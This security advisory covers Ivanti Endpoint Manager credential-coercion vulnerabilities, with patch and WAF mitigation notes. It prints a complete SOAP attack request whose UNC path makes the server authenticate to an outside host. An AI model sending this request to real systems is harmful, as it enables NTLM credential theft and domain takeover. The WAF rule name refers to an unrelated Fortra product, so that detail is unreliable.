[2026.02 Vulnerability Report] Ivanti EPM Absolute Path Traversal | SECaaS Platform AIONCLOUD

Threat Intelligence Report

Get up-to-date information on web application vulnerabilities, attacks, and how to respond.

Back to Threat Intelligence Report

[2026.02 Vulnerability Report] Ivanti EPM Absolute Path Traversal

This vulnerability is a credential coercion vulnerability in Ivanti Endpoint Manager.
An attacker can attempt to obtain credentials and ultimately take over a domain by sending
SOAP XML data containing a remote UNC address accessible to the attacker's server to /WSVulnerabilityCore/VulCore.asmx.

A security patch for this vulnerability was released in January 2025, and AIWAF products will address this vulnerability
through the "2289 / Fortra GoAnywhere MFT Authentication Bypass (1)" pattern, which will be added in the February 2026 pattern update.

1. Overview

Ivanti Endpoint Manager (EPM) is an IT asset and security management solution that provides integrated management of
all endpoints within an enterprise, including PCs, mobile devices, and IoT equipment.

This report summarizes the analysis of vulnerabilities identified
as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 that occurred in this solution.


Source : https://thehackernews.com/2024/10/ivanti-endpoint-manager-flaw-actively.html

2. Attack type

CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 are credential coercion vulnerabilities that were registered
in the NVD in January 2025. After these vulnerabilities were reported, horizon3.ai released a detailed analysis of them.

These vulnerabilities allow an attacker to manipulate an absolute path-based path traversal flaw to send a crafted UNC path,
causing Ivanti EPM to access an attacker-controlled SMB server located at that path, leading to credential theft.

An attacker can exploit this vulnerability by sending SOAP XML data containing a remote UNC address accessible to the attacker’s server
to the vulnerable endpoint /WSVulnerabilityCore/VulCore.asmx. When Ivanti EPM attempts to authenticate to the attacker’s SMB server,
the attacker can capture the NTLMv2 credentials and relay them to an LDAP server to create a privileged machine account,
enabling privilege escalation and potential domain takeover.

This issue occurs within the GetHashForFile, GetHashForSingleFile, GetHashForWildcard, and GetHashForWildcardRecursive functions
in the VulCore class, with separate CVE identifiers assigned for each function.

Example attack request:

POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
Content-Length: 426
Content-Type: application/xml; charset=utf-8
Host: vulnerable.site.com
Soapaction: http://tempuri.org/GetHashForWildcardRecursive

User-Agent: HTTPie
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
               xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <GetHashForWildcardRecursive xmlns="http://tempuri.org/">
            <wildcard>\\\\test.com\\tmp\\file1.txt</wildcard>
        </GetHashForWildcardRecursive>
    </soap:Body>
</soap:Envelope>


3. Response

Since Ivanti included a security patch for this vulnerability in the January 2025 security update,
customers using this solution can mitigate the issue by applying that patch.

In our AIWAF, this vulnerability will be addressed through the “2289 / Fortra GoAnywhere MFT Authentication Bypass (1)”
pattern, which will be added in the February 2026 pattern update.


Source : https://hub.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6

4. Conclusion

Ivanti Endpoint Manager (EPM) is an IT asset and security management solution that integrates the management
of all endpoints within an enterprise, including PCs, mobile devices, and IoT equipment. The vulnerabilities identified
as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 are considered highly exploitable, as detailed
attack methods have been disclosed and the level of technical difficulty required to exploit them is relatively low.
Therefore, customers using this solution are strongly advised to promptly apply the relevant security patches.

Our TA team continues to monitor vulnerabilities discovered in Ivanti products and will respond quickly to any newly identified issues in the future.

5. References

Scroll Up